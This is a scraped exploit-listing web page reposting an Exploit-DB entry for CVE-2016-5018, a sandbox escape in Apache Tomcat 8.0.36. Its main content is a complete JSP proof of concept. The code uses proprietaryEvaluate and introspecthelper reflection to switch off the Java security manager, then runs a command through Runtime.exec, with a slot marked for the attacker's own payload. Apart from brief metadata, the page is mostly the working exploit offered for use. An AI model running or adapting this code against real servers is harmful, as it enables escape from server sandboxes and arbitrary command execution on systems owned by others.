Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape - exploit.company
header-logo
Suggest Exploit
vendor:
Tomcat
by:
Harrison Neal, PatchAdvisor
9.1
CVSS
CRITICAL
Sandbox Escape
501
CWE
Product Name: Tomcat
Affected Version From: 8.0.36
Affected Version To: 8.0.36
Patch Exists: NO
Related CWE: CVE-2016-5018
CPE: a:apache:tomcat:8.0.36
Metasploit: https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/ubuntu-usn-3177-2/https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2016-5018/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-5018/
Other Scripts:
Platforms Tested: Windows
2020

Tomcat proprietaryEvaluate 9.0.0.M1 – Sandbox Escape

Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
# Date: 2020-01-07
# Exploit Author: Harrison Neal, PatchAdvisor
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
# Version: 8.0.36
# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
# Tested on: Windows 
# CVE: CVE-2016-5018
 /*   
# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.   
# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
# In the Java tab, add the following options:
# -Djava.security.manager
# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
 */
 
 <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
<%   
    SecurityManager sm = System.getSecurityManager();
    
    if (sm != null) {
        try {
            ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();

            { // Tomcat 7+
                // Get the desired method
                Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
                        "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
                        Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7

                Method theMethod = null;

                for (Method m : methods) {
                    if ("executeMethod".equals(m.getName())) {
                        theMethod = m;
                        break;
                    }
                }

                // Set it to accessible
                JspRuntimeLibrary.introspecthelper(
                        theMethod,
                        "accessible",
                        "true",
                        request,
                        null,
                        false);

                // Run it
                theMethod.invoke(pageContext.getServletContext(),
                        System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
                        null,
                        new Object[]{null}
                );
            }
            
            /*{ // Tomcat 5.5 and 6
                pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
                PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
            }*/
            
        } catch (Throwable ex) {
            PrintWriter pw = new PrintWriter(out);
            ex.printStackTrace(pw);
            pw.flush();
        }
    }
    
    // Your payload goes here
    try {
        Runtime.getRuntime().exec("calc");
    } catch (Throwable ex) {
        PrintWriter pw = new PrintWriter(out);
        ex.printStackTrace(pw);
        pw.flush();
    }
    
    // Optional put the security manager back
    if (sm != null) {
        System.setSecurityManager(sm);
    }
%>

Navigation

Suggest Exploit

Services By CQR

cqrsecured